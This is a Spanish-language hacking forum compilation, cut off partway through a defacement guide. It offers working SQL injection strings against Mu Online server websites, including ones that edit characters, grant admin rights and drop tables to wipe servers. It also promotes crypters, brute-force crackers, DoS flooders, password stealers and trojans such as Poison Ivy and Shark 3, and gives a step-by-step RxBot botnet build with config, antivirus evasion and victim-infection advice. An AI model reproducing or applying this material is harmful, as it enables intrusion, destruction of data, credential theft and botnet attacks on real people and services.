infector

Nuevo

 Inyeccion SQL

Wenas les traigo el tutorial de la inyeccion SQL esta sirve para editarte en un servidor o y sea borrar todas las cuentas (TUMBARLO)
Tenemos que descargar el Tamper Data obligatoriamente tienen que usar firefox, lo descargan de aqui
Firefox:
http://www.mozilla-europe.org/es/firefox/
y el Tamper Data de aca:
https://addons.mozilla.org/es-ES/firefox/addon/966/

una vez que los tengamos hacemos lo siguiente:

1- Vamos a la Pagina web del Mu que estemos Jugando.

2- Vamos a la seccion de Registro. Ejemplo: http://www.paginadelmu.com/index.php?op=register

3- Llenamos todos los Campos de Registro.

4- Una ves instalado el Tamper data , Vamos a Herramientas >> Tamper Data >>> Comenzar Modificacion

5- Ahora precionamos Enviar en el formulario de Registro , Y Nos Saldra un Cartel Diciendo Modificar , Enviar , Abortar Peticion


6- Precionamos en Modificar , Buscamos donde Dice Username o Account y Colocamos la Injeccion SQL que queremos hacer.

7- Listo , Colocamos enviar y Luego Abortar Peticion

Codigos Injecciones:

Colocarte 200 Resets a tu Personaje
'x'; update character set resets = 200 where name = 'NOMBREDETUPJ'

Eliminar todos los Personajes del Server
'x' ; delete character

Cambiar de Raza tu Personaje
'x'; update character set class = 64 where name = 'NOMBREDETUPJ'


0 [DW ], 1 [SM ], 2 [GrandMaster] 16 [dk] 17 [bk] y 18 [bm] 64 [dl] 65 [le]


Desconectar todos los Personajes del Server
'x'; UPDATE MEMB_STAT SET ConnectStat='0' WHERE ConnectStat='1'

Full Stats tu Personaje
'x'; update character set strength=32767,dexterity=32767,energy=32767,vitali ty=32767,leadership=32767 where name = 'Kenya'

Colocar tu Personaje Level 400
'x'; update character set clevel=400 where name = 'NOMBREDETUPJ'


Copiar Vault de Otro Personaje
'x' ; UPDATE warehouse SET Items = (select items from warehouse where accountid = (select accountid from character where name = 'nombrepjacopiarbaul')) WHERE AccountID = 'nombredetucuenta'

Dejar Personaje Normal
'x'; update character set ctlcode = 0 where name = 'NOMBREDETUPJ'

Banear Personaje
'x'; update character set ctlcode = 1 where name = 'NOMBREDETUPJ'

Hacer GM tu Personaje
'x'; update character set ctlcode = 8 where name = 'NOMBREDETUPJ'

Colocarte LevelUP Points
'x'; update character set leveluppoints = 432 where name = 'NOMBREDETUPJ'


Codigo Items En tu Inventario
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB27F0570000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB67F0580000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB77F0590000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB37F05A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB47F05B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x0EEFFF00002FB57F0500000000000000 WHERE AccountID = 'mastercito'

----------------------------------------- ANUBIS -------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC2000570000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC4000580000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002CC30F0590000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC50005A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FF50F05B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x15EFFF0000FFC60005D0000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- BLESS --------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x0DEFFF0000FFC60001E0000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- Sun ----------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B07F0078000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B17F0088000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B27F0098000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B37F00A8000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B47F00B8000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- Ashcrow ------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB37F0070000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB47F0080000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB57F0090000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB67F00A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB77F00B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB87F0000000000000000 WHERE AccountID = 'mastercito'
--------------------------------------------- RING -----------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x15EFFF0000C1C67F00D0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x1CEFFF0000DFB27F00D0000000000000 WHERE AccountID = 'Bakura'

Eliminar Guild
'x' ; Delete Guild

Cambiar Inventario
'x'; update character set inventory = 0x where name = 'NOMBREDETUPJ'

Cambiar Codigo de Administracion Web
'x'; INSERT INTO MuWeb_admin(username,password,securitycode)VALUES( 'MUAdmin','123123','0123')

ZEN Para tu PJ
'x'; update character set money=2000000000 where name = 'NOMBREDETUPJ'

Hacer Full stats a tu Personaje
'x'; update character set strength=65000,dexterity=65000,energy=65000,vitali ty=65000,leadership=65000 where name = 'NOMBREDETUPJ' 




 Hack Fear And Zombie THM Hack + Bypass Actualizado  

bueno aca les traigo el Zombie hack + Bypass
primero descargamos:
Por: Megaupload
megaupload.com megaupload.com9F9010HS
Por: MediaFire
http://www.mediafire.com/?b5qsjsic9p2vq7a
Por: Rapidshare
rapidshare.com rapidshare.comFear_And_Zombie_Hack.rar

Tambien tenemos que descargar el ByPass
Por: Megaupload
megaupload.com megaupload.com4VRCDFFY
Por: MediaFire
http://www.mediafire.com/?xcjgqqyz41861sx
Por: Rapidshare
rapidshare.com rapidshare.comByPass_Player_V.1_Original.rar


aca algunas imagenes 


aca los comandos :

F2 : Fear Hacks !!

F3 : Zombie Hacks !!

solo aprietas una ves y se quedara Automatico

Weno eso es todo nos vemos en el proximos post xaionara cheers cheers 




Desconectado yesid093

  • Excelent User!!
  • *****
  • Mensajes: 534
  • Aplauso[s]: 39
    • Lineage II Gracia Final
    • Email
Inyecciones sql para editarse o tumbar servers
« : octubre 20, 2009, 01:58:27 pm »
 
pues lo bueno es que por este metodo se puede hacer casi de todo, lo malo es que algunos servers vienen parcheados contra esto

aca veremos las basicas inyeccciones sql que se colocan generalmente en donde se coloca el msn para recuperar clave o registrarse

Web vulnerables: MuWeb 0.4 & otras

Editar Items en Baul

' UPDATE warehouse Set items= 0x WHERE (accountid = 'micuenta')--

Borrar Personaje

' UPDATE ' DELETE Character = 9 WHERE (Name = 'mipj')--

Editar Zen

Cita
' UPDATE Character Set Money = 2000000000 WHERE (Name = 'mipj')--
 

Convertirte en Game Master
Código:

Cita
' UPDATE Character Set CtlCode = 10 WHERE (Name = 'mipj')--
 


Editar Nivel
Código:

Cita
' UPDATE Character Set cLevel = '174' WHERE (Name = 'mipj')--
 


Editar reset

Cita
' UPDATE Character Set Reset = 100 WHERE (Name = 'mipj')--
 


Cambiar de raza

Cita
' UPDATE Character Set Class = 8 WHERE (Name = 'mipj')--
 


Editar fuerza,energia etc.

Cita
' UPDATE Character Set Strength = 290,Energy = 800,Dexterity = 890,Vitality = 100,cLevel = '280',Money = 500000000,Class = 0 WHERE (Name = 'mipj')--
 

en cada inyeccion reemplaza mipj o micuenta por tu pj o cuenta obvio, algunas inyecciones no caben en la web, esto se soluciona

Tamper Data(Descarga): https://addons.mozilla.org/es-ES/firefox/addon/966

 - Una ves instalado el Tamper data , Vamos a Herramientas >> Tamper Data >>> Comenzar Modificacion
 
 - Ahora precionamos Enviar en el formulario de Registro , Y Nos Saldra un Cartel Diciendo Modificar , Enviar , Abortar Peticion

 - Precionamos en Modificar , Buscamos donde Dice Username o E-Mail y Colocamos la Injeccion SQL que queremos hacer.

 -  Listo , Colocamos enviar y Luego Abortar Peticion

para tumbar servers

con esta inyeccion le borramos todos los pjersonajes al server de mu XD

'';Drop Table Character;--        <----- esta se puede colocar sin necesidad del Temper Data de firefox

Con esto nos aseguramos que este server cuando buelva a prender prenda desde 0


saludos, y recuerden usen pero no abusen NO TODA WEB ES BULNERABLE




DarkCrypt



Darkcrypt es un crypter tiene opcion para ingles (lo digo por la imagen) actualmente no es detectado por NOD32 y otros antivirus comunes, la utilización es simple, dejan las opciones tal como aparecen en la imagen y clickan en el boton derecho de abajo para encriptar, el programa creara un backup del programa encriptado en un nuevo archivo algo asi “server [backup].exe” mientras el que mantenga el nombre original sera el archivo ya encriptado y no detectado por los antivirus, perfecto para encriptar troyanos y virus y que esos no sean detectados por los antivirus mas comunes.







ASPack 2.1


AsPackASPack comprime los ficheros EXE y DLL pero los mantiene totalmente ejecutables, sin necesidad de descomprimirlos para su ejecución.

ASPack comprime los ficheros un 70% aproximadamente. Es de gran ayuda para que tus propios programas ocupen menos espacio y cargen con mayor rápidez.

También puede realizar una búsqueda por tu disco duro para encontrar y reducir el tamaño de los ficheros EXE y DLL que encuentre.






NsPack v3.4 full cracked


NsPack v3.4NsPack – comprimir de 32 bits y 64bits exe, dll, ocx, scr ventanas de programa
El norte de inicio para comprimir las ventanas es un maravilloso programa que es superior a otros softwares, como Aspack, upx, etc

El programa puede comprimir de 32 bits y 64bits exe, dll, ocx, scr ventanas de programa, así como C #. Netos programa.

NsPack es un software que permite comprimir los ejecutables.

Este software es diferente de los compresores de archivos comunes. Si queremos comprimir un programa utilizando un compresor de archivos comunes, no podemos ejecutar el programa directamente para
Tenemos que descomprimirlo en primer lugar. Sin embargo, al empezar a comprimir nuestro norte es utilizado, el programa se puede ejecutar directamente después comprimido por el compresor.

Si se produce un programa, el programa es muy fácil de modificar por herramientas como depurador.

Cuando el programa está comprimido por el compresor, si alguien quiere modificar el mismo, debe tickly la concha en primer lugar. Además, es conveniente publicar en un programa de pequeño tamaño que más y más software producciones se publican en forma de comprimidos.





FTP Cracker


ftp crackerSencillo ftp cracker y efectivo para hackear webs que no tengan protecciones contra este tipo de ataques de fuerza bruta (brute force). FTP Cracker creado por command tribulation, uno de los mejores grupos de defacers.


MessenPass v1.15


messenpassMessenPass, una aplicación capaz de localizar el nombre de usuario y la contraseña de todos aquellos que iniciaron sesión en el equipo.

Los clientes de mensajería que soporta MessenPass son los siguientes: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger (en versiones 5.x y 6.x), ICQ Lite 4.x/2003, AOL Instant Messenger, (aunque sólo antiguas versiones), Netscape 7; Trillian; Miranda y GAIM/Pidgin.

MessenPass no necesita instalación y su uso es sencillo, ya que en la pantalla inicial muestra los usuarios y las contraseñas, aunque tiene problemas para recuperar información de Trillian, Netscape, AIM, GAIM y Miranda.

Para resolverlo, puedes ir al menú ’archivo’, pinchar en selección de fuentes (select folders) y buscarlo manualmente en tu PC. También puedes copiar, pegar o guardar las cuentas que desees en el bloc de notas y en otras aplicaciones.


WebCracker 4.0


webcracker

Crackeadr web http, puedes utilizar listas de usuarios y contraseñas que el mismo programa genera o por otras tuyas, cracker muy potente.


Brutus AET2


brutus aet2 Famoso Crackeador de contraseñas, por su gran sencillez, eficacia, y facilidad de uso.
Puede crackear la password desde un archivo o usando la fuerza bruta.
Puede crackear passwords de todo tipo como HTTP (Basic Auth), FTP (File Transfer Protocol), HTTP (Form), FTP, Telnet, SMB (NetBIOS).


Turbinas By Volks 1.0


turbinasTurbinas by volks es un programa algo viejito (2006) utilizado para tirar servidores. Con este programita pude tirar servers de varios juegos online, como mu online, counter strike 1.6, ragnrok, algunas webs pequeñas, etc (todo a modo de prueba,)..
Se preguntaran que tipo de servidores pueden tirar, bueno pensando un poco se daran cuenta que depende de la conexion de internet del atacante y de la victima, de que tipo de server se trate, de las protecciones, etc. No vallan a querer intentar tirar google, ni servidores grandes, que no le haran ni cosquillas.


Como funciona?

Forma Técnica:
“Es un programa que conecta y desconecta sockets, en un milisegundo conecta y desconecta, osea que 1000 milisegundos = 1 segundo multiplicado por 5, genera 5.000 conexiones por segundo al servidor , lo cual hace que el mismo colapse.”

Forma no técnica:
“Suponga que hay una puerta grande (10MB de host de un servidor), y que 5.000 personas quieren entrar y salir en un segundo, entonces al no poder colapsa el servidor.”

Como se usa?
Facil, tienen que seleccionar el IP, y el puerto, Y ir activando las turbinas (tambien pueden seleccionar el intervalo cuanto menos intervalo mas rapido conectaran y conectaran (esta puesto en 100 milisegundos).
Si elijen cualquier IP y cualquier Servidor, no les dara error ya que esta compilado con “Error resume Next” de Visual basic, para que no den errores de overflow para los sockets.


IGMP DoS Flooder


Es un programa de envío masivo de paquetes a una IP de un servidor o de un único usuario,dinámica o estática.El envío de estos paquetes es con el fin de colapsar la máquina remota xD
Nota: Si tu antivirus salta es normal, ya que lo detectará como nuker o como DoS flooder…


RxBOT


Bot para infectar a gente como un troyano y crear una botnet, con una botnet puedes hacer de todo, desde hacer perder dinero ha empresas,joder servicios,espiar por la webcam a los bots, spammear con los bots, usar los bots como proxy, ataques DDoS, Doosear IP’s, información completa acerca del bot infectado, borrar archivos,renombrar archivos, descargar archivos de internet al ordenador del bot….

Bueno, yo no sé si eso lo hará otro troyano, yo hablo del mio, mi botnet está montada por mi troyano pero el RxBot tiene las mismas funciones.

Claro, para montar una botnet necesitas usar algún script como mIRC

y conectar a un servidor irc, ejem: irc-hispano.org y un canal: #botijuelos


MANUAL: Crear botnet usando Rxbot


Explicación hecha por RaKi0N, Manual hecho por xXDarkXx:

¿Qué es una botnet?

Una botnet es una red normalmente organizada por “hackers” para cometer fraudes en internet, como ataques DoS o DDoS.

¿Cómo actúan?

Estos bots son manejados por humanos a la vez que se manejan por IRC con comandos y actuan de forma semiautónoma, estos bots son personas que en su equipo se ha infectado por un “Troyano” capaz de convertir su máquina en un uso para el hacker que diseñó la botnet

¿Qué tipos de botnet hay?

-Están las botnet serias, que catalogamos que lo usan para tirar páginas con contenido erótico, o usadas por hackers para beneficio propio

-Están las botnet para los lammers, si si, aquellos que las usan para joder y reirse de otros diciendo “tengo botnet” y con ello viven feliz.

¿Qué tipos de troyanos hay para crear botnet?

Troyanos están:

-Rxbot, que es el cual con el que está hecho este manual

-RvBot (no lo he probado pero bueno)

-AgoBot otro bot totalmente la hostia, si si, la hostia

Y muchos más bots que con su compilación podemos hacer la botnet.

1. INTRODUCCIÓN

Este documento ha sido escrito en términos de ayuda para las personas que empiezan a manipular los rbots , urxbots, y demás derivados. Se explicará la manera de compilarlos, configurarlos, infectar, y si posees conocimientos de c++, puedes agregarles más funciones.
Para fines de este artículo se va a usar un código llamado xBot.

2. REQUISITOS

· Necesitas tener instalado la versión del visual c++ 6.0 en inglés (recomendado).
· Instalar el Service Pack 6 para el Visual C++ 6.0.
· Instalar PSDK-x86
· El código del xBot:

Código:
· El themida
· Ganas y atención J

3. PREPARANDO NUESTRO VISUAL C++ 6.0

Ahora empezamos con lo que nos interesa, vamos a seguir los pasos siguientes:

1. Instalar el Visual C++ 6.0
2. Instalar el Service Pack 6 para el Visual C++ 6.0, que se encuentra en la carpeta Vs6sp6 y PSDK-x86 y se llama Vs6sp6. [Lo descomprimimos en una carpeta que puede ser c:vs6sp6 y luego dentro de la misma ejecutamos el setupsp6 de instalación.]
3. Luego instalar el PSDK-x86, que también está incluido en la carpeta Vs6sp6 y PSDK-x86 y se llama PSDK-x86. [Esto toma un cierto tiempo digamos unos 30 minutos dependiendo de tu conexión a Internet].
4. Ahora vamos a configurar el Visual C++ 6.0 para compilar el xBot:

· Abrimos el Visual C++ 6.0 y nos vamos a la pestaña: Tools —> Options

5. En la parte de Options, nos vamos a la pestaña Directories y hacemos clic donde indica la flechita.

6. Luego miramos en la parte de Show directories for: Incluye Files (Y para qué?. Pues ahi no solo dice Include Files sino también Library Files, Source Files y debemos configurar para esos 3 directorios el PDSK) y al abrirse la nueva ventana le damos clic en los … para buscar la carpeta INCLUDE que instalo PSDK-x86. En mi caso se encuentra en C:Archivos de programaMicrosoft Platform SDKInclude y pulsamos OK.

7. Ahora debemos colocar el C:Archivos de programaMicrosoft Platform SDKInclude, en la primera línea usando las flechitas y debe quedarnos asi:

8. Hasta ahí solo hemos configurado la parte de Include files, se necesita hacer lo mismo para Library files y luego para Source files.
Se hace de la misma manera que Includes Files en este caso se tendrá que seleccionar Library files y buscar la ruta y luego colocarla en la primera línea lo mismo para Source files.
Executable files no se toca.
· Para Library files la ruta en mi caso fue:
C:ARCHIVOS DE PROGRAMAMICROSOFT PLATFORM SDKLIB

· Para Source files la ruta fue:
C:ARCHIVOS DE PROGRAMAMICROSOFT PLATFORM SDKSRC

Y luego OK

Luego de hacer esos 8 pasos tan detallados, es hora de compilar el xBot y configurarlo.

4. COMPILANDO Y CONFIGURANDO EL XBOT

En esta parte, se verá la manera de abrir el xBot y luego trabajar con la configuración.

4.1 Abriendo un Workspace

Abre el Visual C++ 6.0 y sigue el gráfico: Clic en File à Open Workspace

4.3 Compilando:

Ahora luego de cargar el proyecto, vamos a la pestaña Build à Rebuild All

4.4 Verificando errores

Si por algún motivo tienes errores, verifica los pasos anteriores de configuración del visual c++ 6.0 con el sp6 o el PSKD-x86

Ya tenemos todo casi listo pero nos falta saber dónde se guarda el ejecutable que acabamos de construir.

4.5 Buscando el Ejecutable

Por defecto el ejecutable que construimos se encuentra en la carpeta Release (No Ejecutarlo)

Ahora que ya tenemos los conocimientos de cómo configurar el visual c++ 6.0, de construir el ejecutable del xBot, es hora se configurarlo y explicar un poco en qué consiste.

4.6 Configurando el xBot a un determinado servidor y Canal de IRC

Esta es la parte principal de nuestro xBot y vamos a explicar como configurar:

· Lo primero es ir a la carpeta Header’s y luego al archivo configs.h, haciendo doble clic.
· En la parte derecha vemos lo siguiente:



char botid[] = “”; // bot id
char version[] = “”; // Bots !version reply
char password[] = “”; // bot password
char server[] = “”; // serverchar serve
rpass[] = “”; // server password
char channel[] = “”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “bling.exe”; // NO CAMBIAR ESTO
char keylogfile[] = “”; // keylog filename
char valuename[] = “”; // value name for autostart
char nickconst[] = “”; // first part to the bot’s nick
char szLocalPayload File[]=”"; // Payload filename
char modeonconn[] = “”; // Can be more than one mode and contain both + and -
char exploitchan[] = “”; // Channel where exploit messages get redirected
char keylogchan[] = “”; // Channel where keylog messages get redirected
char psniffchan[] = “”;

Aquí es donde vamos a configurar:

Botid[] = “rbot” ; ß Sin comentarios

Version[]= “2006”; ß Sin comentarios

Password[]= “peruvianrlz”;

· Esto sirve para que cuando este en el canal lo pueda llamar asi: .login peruvianrlz [Esto es la manera de llamar a la máquina zombie en el canal de irc. La documentación de uso del xBot esta en la carpeta DOCUMENTOS]

Server[]=”irc.loquerias”;

· Aca estoy diciendole al bot a que servidor debería entrar cuando sea ejecutado por la víctima.

Serverpass[]=”clave_del_server”;

· Si el servidor posee una contraseña aca le colocamos.

Channel[]=”#peru”;

· Aca especificamos el canal a donde se ira la maquina que ejecute el xbot

Channelpass[]=”clave_del_canal”;

· Lógicamente especificamos la clave del canal si este posee una

Veamos un ejemplo de cómo debe queda configurado:

char botid[] = “DiE”; // bot id
char version[] = “[rxBot v0.6.6a "; // Bots !version reply
char password[] = “fucku”; // bot password
char server[] = “irc.server.net”; // server
char serverpass[] = “”; // server password
char channel[] = “#peruvian”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “bling.exe”; // NO CAMBIAR ESTO
char keylogfile[] = “system.txt”; // keylog filename
char valuename[] = “Microsoft Update Machine”; // value name for autostart
char nickconst[] = “[Rlz]-”; // first part to the bot’s nick
char szLocalPayload File[]=”msconfig.dat”; // Payload filename
char modeonconn[] = “+n+U”; // Can be more than one mode and contain both + and -char exploit
chan[] = “#peruvian “; // Channel where exploit messages get redirected
char keylogchan[] = “#peruvian “; // Channel where keylog messages get redirected
char psniffchan[] = “#peruvian “;

Ahora que ya configuramos el configs.h , podemos construir el ejecutable Build à Rebuild All

5. PROTEGIENDO NUESTRO XBOT DE LOS ANTIVIRUS

Ahora que ya tenemos nuestro ejecutable debemos hacerlo indetectable ante los antivirus y una herramienta que me está dando resultados es: THEMIDA

Hacemos clic donde nos indica la flecha y buscamos nuestro ejecutable, que se encuentra en la carpeta Release y luego le damos clic en el candadito que dice Protect

Cerramos el Themida y ya tenemos nuestro xBot protegido contra las búsquedas heuríticas de algunos antivirus.

6. INFECTANDO Y BUSCANDO VÍCTIMAS

Siempre en este mundo de tecnologías y muchas computadoras existe algo que se llama ingenio, es por eso que daré algunos consejos antes de empezar a infectar.

· Ya tienes todo listo para darle a algún amigo el ejecutable y que este lo ejecute en su computador.
· Es necesario que entiendas algunas cosas como por ejemplo char server[] = “irc.server.net”;, todas las máquinas que ejecuten su código siempre irán a ese servidor, pero que sucedería si ese servidor cierra?, se perderán todas tus rbots (máquinas infectadas).
· Para eso es necesario no colocar el nombre de un servidor en especial sino de un DNS ejemplo: peru.dns.com. y ¿por qué?
· Pues porque con un dns (http://www.cdmon.com/) , vas a tener localizados a todos tus bots. Ejemplo: si quieres meter tus bots a un servidor: irc.server3.ne t, lo único que tendrías que hacer es ir a tu cliente dns y ponerle el ip del servidor de irc y automáticamente tus bots se van a meter al servidor irc.server3.ne t y luego al canal que configuraste en tu xBot, ejemplo #peruvian.
· Las formas de infección son de acuerdo al ingenio que poseas, una forma es camuflando el rbot con otros ejecutables como x ejemplo con un instalador, con un crack de algún programa y compartirlo por el emule, etc.
· Otra forma es crear un virus que se reprodusca por p2p y agarre el codigo de tu rbot dentro del mismo J
· Lo demás va por cuenta tuya.

7. ANALIZANDO UN XBOT

Junto al artículo puse un video de cómo un conjunto de computadoras en un determinado servidor y canal de IRC, hacen el llamado flood a una página importante del Perú (www.reniec.gob .pe)

La documentación de los comandos del xBot, va incluidos junto al artículo y explicados detenidamente su uso.

Hasta el momento se dio el primer paso para que empiecen a manipular los rBots y jugar un poco con ellos. Espero que este pequeño y detallado tutorial como primera parte les sirva a muchos. No olviden que la documentación de el xBot tiene todos los comandos a usar en el irc.
Otra cosa muy importante si tienes conocimientos de C++, puedes leer las referencias bibliográficas que te ayudarán mucho a entender el código y poder modificarlo a tu gusto.
Espero poder continuar con el segundo tutorial y de la misma manera que los xBots explicarles detalladamente el proceso de configuración, compilación e infección.

Este manual no ha sido creado por RaKi0N.
Posteé este manual para todo aquel que quiera aprender y aportar Smiley

Nota: Descargar Rxbot

Saludos! 

SynDoS v.1.1


Syn DoSLa fragmentación de paquetes TCP Syn-ataque. Puede detener por completo en Win2k Sistemas de Redes locales, Firewalls dont asunto. Colores personalizables de amOkk – Consola GUI. Añadido por Radost

 


UDP Flooder


udp flooder 2.0
Con este programa podras hacer ataques de D.o.S al protocolo UDP, muy efectivo. Podras tirar servidores que no esten protegidos contra este tipo de ataques y dejarlos sin conexión.


MSN KICK


msn kickPatea a tus contactos del msn con esta gran utilidad muy sencilla.

1) primero desactiva “mostrar iconos gestuales” en tus Opciones del messenger
2) Abre solo la ventana de conversación de tu victima. Cierra las demás ventanas
3) Pulsa el siguiente boton para patear a tu contacto (Kick Now!)

y así, Facilmente!, tu contacto sera expulsado del msn.


este programa lo puedes convinar con Ice Cold reloaded, y tendras un convinado muy bueno.

Ghost Msn (Fake MSN)


Ghost msn es un fake avanzado para msn. Con la caracteristica especial que permite enviar las contraseñas de msn a un servidor FTP.
Cuando la victima abra el fake le saldra un error diciendo que no se cargaron las opciones (ustedes pueden configurar este mensaje a su gusto). Entonces cuando la victima se conecte con su id de passport su contraseña sera enviada a nuestro servidor ftp.
Con el GhostMSN Builder creamos el fake del live msn, para ello debemos colocar nuestro servidor ftp usuario y pasword (se pueden crear una cuenta en miarroba.com o en www.ueuo.com)
Es la primera version de este fake, por lo que puede tener errores, yo ya encontre algunos.
Para que la victima caiga hay que saber utilizar un pokito la cabeza, o bien adjuntar el fake a un archivo batch que reemplaze el msn “original” por el fake.


 


MSN Nightmare v2.2 final


MSN Nightmare es una pequeña aplicación que te permite interceptar remotamente todo lo que se envía o recibe del MSN Messenger e incluso intervenir en medio de una conversación suplantando el PC en el que está instalado. Cómo utiliza técnicas de inyección jamás es detectado por ningún antivirus ni firewall.

Características:
* Espiar conversaciones de MSN Messenger
* Intervenir en una conversación suplantando al PC remoto
* Evitar recepción y envió de mensajes
* Recuperación de passwords del Messenger (en el registro y por keylogger)
* Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
* Desinstalar remotamente
* Shell Inversa
* Pequeña utilidad para comprobar si tienes los puertos del router abiertos
* Función subir Log de conversaciones y passwords a ftp para no tener que abrir puertos
* Conexión sin necesidad de determinar IPS


Imágenes
 
 

 






Wifi Attack Tools AIO


wifi toolsun conjunto de herramienta para el ataque a redes Wifi . Contiene Kismet, WEPCrack, Hot Spotter, Netstumbler, Airsnot, Wellenreiter, Wepwedgie.


 





Universal 1337 – The account stealer


Universal 1337 - The account stealerUniversal 1337 es un capturador de contraseñas de todo tipo, puede enviar los datos a un servidor ftp o a una cuenta de mail.
El server es bastante detectado y pesado (1.6Mb), pero incluye opciones para eliminar firewall y antivirus, tambien incluye un downloader.
Y se lo puede encriptar facilmente sin romper el server con cualquier encriptador.
Tambien permite cambiar el icono del server, mostrar mensaje al ejecutarse, cambiar la extension del server etc.
Recomiendo crearse una cuenta ftp o de email exclusiva para este programa.


Algunos de los password que captura:

Steam
Produkt Keys
Network Passes
Paypal
Ebay
AIM
ICQ
Miranda
Trillian
MSN Messenger
AOL Instant Messenger
Windows Messenger (In Windows XP und Vista)
Windows Live Messenger (In Windows XP und Vista)
Yahoo Messenger
Google Talk
GAIM (Pidgin)
Windows Mail
Outlook Express
Microsoft Outlook
IncrediMail
Eudora
Netscape
Mozilla Firefox
Internet Explorer
Group Mail Free
PC Infos

sharK 3


Ya salio el troyano shark 3, exactamente compilado el 17-1-2008 en VB.
Este troyano tal vez sea el sucesor del bifrost y del poison ivy debido a su gran estabilidad, velocidad, ocultación, calidad y cantidad de herramientas, ademas de muchas características innovadoras no incluidas en ningún troyano. A continuación les dejo muchas de las características escritas por mi, supongo que debe tener errores pero es lo que hay.

shark 3Caracteristicas:

-mRC4 Encriptacion de trafico
-zLib Compresion de Trafico
-Instalacion por defecto, incluye 7 opciones
-Pasword de conexion
-Permite seleccionar el intervalo de tiempo para la conexion del server
-keylogger, con caracteristica highlight, permite seleccionar maximo de tamaño del log, permite buscar.
-Testear los host
-Nombres de instalacion y extensiones aleatorias
-HKML startup
-Reg-HKU startup
-Eventos al ejecutar el server, (ejecutar archivo o abrir pagina web)
-Incluye un binder completo en la creacion del server, asi que olvidensen de andar buscando binders, joiners, etc.
-Blacklist, permite matar, frezar, cerrar, etc un proceso o parar, pausar, cerrar, etc un servicio
-Antidebugging, incluye maquina virtuales como VMWare, virtualBOX, etc
-Metodos de ocultacion, muy buenos.
-Firewal by pass
-Opciones avanzadas, claves del stuff aleatorias, compresion, tolerancia… etc
-Sumario final
-Comprimir con UPX
-Cargar y guardar configuracion
-Configuracion del server
-Blacklist
-Noticias
-Informacion del sistema
-Aplicaciones instaladas
-CD keys
-Autostart manager
-Administrador de procesos
-Administrador de servicios
-Administrador de archivos
-Editor de registro
-Administrador de ventanas
-Busqueda de archivos
-Puertos abiertos
-Redireccion de DNS
-Opciones de suspencion, apagar el sistema, reiniciar, suspender monitor, suspender administrador de tareas, etc
-Captura de pantalla, rapida, con muchas opciones, permite utilizar el teclado y el mouse en la pc victima
-Captura de la webcam
-Captura de audio
-Shell remota
-Web Downloader
-Ejecucion de memoria
-Chat con la victima
-Imprimir en la pc victima
-Vistas de escritorios en miniaturas
Y muchisimo mas


 


Poison Ivy 2.3.0


poison ivy 2.3.0transf2.pngEl poison, se trata de un troyano de conexion inversa. Esta compuesto de dos partes; un cliente.exe que es mediante el cual creamos el server, y una vez creado, tendremos un server.exe que es el que tendremos que enviar a nuestras victimas para que lo ejecuten, y poder controlar remotamente su pc.


hackear webspacemania (gratishost)


Como hackear webs de gratishost aqui un pequeño manual.

- – - – Defacear Gratishost – - – -

Defacear webs en gratishost es extramadamente sencillo,no hace falta saber mucho para hackearlas,solamente se necesita un poco de paciencia y las herramientas adecuadas
Y pongo este metodo en especial para mofarme aun mas de estos tipos,ya que menospreciaron el metodo de crackeo por fuerza bruta y ya ven lo que les paso xD.

1.-Primero necesitamos sacar el nombre de usuario ,para esto simplemente basta con provocar un error en la pagina en este caso como tenian un script en php que daba la ip del visitante,entonces basta usar el achilles para falsear nuestra ip ,para configurar el achilles tenemos que poner nuestro navegador para que use proxy con la direccion 127.0.0.1 y el puerto 5000

Cuando veamos que sale el script que pide la ip ponemos algo como esto *? $ipfalsa ?* (substituye * por < y >)de esa forma lograremos ejecutar un error en el script,y para que es esto?? pues para obtener el preciado nombre de usuario
